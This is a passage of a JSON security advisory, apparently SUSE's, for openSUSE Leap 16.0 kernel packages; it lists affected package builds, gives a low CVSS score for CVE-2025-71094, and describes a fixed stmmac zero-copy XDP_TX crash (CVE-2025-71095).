"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
